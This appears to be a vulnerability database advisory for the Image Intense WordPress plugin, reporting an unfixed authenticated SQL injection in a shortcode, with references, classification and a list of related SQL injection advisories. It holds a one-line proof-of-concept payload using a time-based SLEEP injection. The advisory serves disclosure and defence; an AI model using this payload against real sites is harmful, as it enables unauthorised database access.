Image Intense <= 3.2.5 – Authenticated SQL Injection in shortcodes

Description

The vendor does not consider it to be a vulnerability, it remains unfixed.

SQL Injection in handling of the "et_pb_image_n10s" shortcode.

The last version at the time of the original advisory, 3.2.5, is known to be affected.

Proof of Concept

[et_pb_section bb_built="1"][et_pb_row][et_pb_column type="4_4"][et_pb_image_n10s 
_builder_version="3.0.82" src="
test' OR SLEEP(10) -- 
" size="azaz" 
/][/et_pb_column][/et_pb_row][/et_pb_section]

Affects Plugins

image-intense

No known fix

References

URL

https://synacktiv.com/ressources/advisories/Image-Intense-3.2.5-SQL_Injection.pdf

URL

https://besuperfly.com/product/image-intense-plugin/

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

Miscellaneous

Original Researcher

Thomas Chauchefoin / Julien Legras

Submitter

Thomas Chauchefoin / Julien Legras

Submitter website

https://synacktiv.com

Verified

WPVDB ID

5e0af7b2-797c-4774-b261-36976467a293

Timeline

Publicly Published

2018-09-05 (about 7 years ago)

Added

2018-09-05 (about 7 years ago)

Last Updated

2019-11-01 (about 6 years ago)

Other

Published

Title

Published

2024-11-08

Title

WordPress Poll Maker Plugin < 5.4.7 - Authenticated (Administrator+) Time-Based SQL Injection

Published

2014-08-01

Title

mTouch Quiz 3.0.6 - question.php quiz Parameter SQL Injection

Published

2026-02-10

Title

SlimStat Analytics < 5.3.2 - Authenticated (Subscriber+) SQL Injection via `args` Parameter

Published

2024-08-13

Title

Viral Signup <= 2.1 - Unauthenticated SQLi

Published

2017-08-07

Title

Easy Modal < 2.1.0 - Authenticated SQL Injection